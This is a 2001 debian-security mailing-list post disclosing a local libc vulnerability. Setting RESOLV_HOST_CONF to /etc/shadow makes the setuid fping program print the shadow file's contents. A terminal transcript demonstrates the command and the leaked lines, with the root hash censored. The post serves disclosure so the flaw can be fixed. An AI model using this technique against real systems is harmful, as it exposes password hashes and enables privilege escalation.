Since I've not had any response yet, I thought I'd give a demonstration of how nasty this is:
Script started on Mon Jan 8 17:48:23 2001 [EMAIL PROTECTED]:~$ export RESOLV_HOST_CONF=/etc/shadow [EMAIL PROTECTED]:~$ ping localhost PING localhost (127.0.0.1): 56 data bytes --- localhost ping statistics --- 2 packets transmitted, 0 packets received, 100% packet loss [EMAIL PROTECTED]:~$ fping localhost /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::' [snip] /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::' localhost is unreachable [EMAIL PROTECTED]:~$ ls -l `which fping` -rwsr-xr-x 1 root root 19728 May 15 2000 /usr/bin/fping [EMAIL PROTECTED]:~$ ls -l `which ping` -rwsr-xr-x 1 root root 15036 Dec 31 04:11 /bin/ping [EMAIL PROTECTED]:~$ ldd `which fping` libc.so.6 => /lib/libc.so.6 (0x40021000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) [EMAIL PROTECTED]:~$ ldd `which ping` libc.so.6 => /lib/libc.so.6 (0x40021000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) [EMAIL PROTECTED]:~$ exit Script done on Mon Jan 8 17:49:42 2001 It seems to work for some setuid programs, but not others. I'm running the most recent packages from unstable as of today: ii libc6 2.2-9 GNU C Library: Shared libraries and Timezone ii netkit-ping 0.10-5 The ping utility from netkit ii fping 2.2b1-2 Send ICMP ECHO_REQUEST packets to network ho cheers, Thomas On Mon, 8 Jan 2001, thomas lakofski wrote: > From: thomas lakofski <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED], debian-security@lists.debian.org > Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT) > Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability > > Hi, > > A friend of mine just tried this against my unstable box and successfully > obtained the contents of /etc/shadow. > > I imagine that this is a problem in libc -- I'll leave it to > [EMAIL PROTECTED] to file bug reports. > > cheers, > > Thomas > > -- who's watching your watchmen? gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d 2B72 53DB 8104 2041 BDB4 F053 4AE5 01DF 81FD 4B43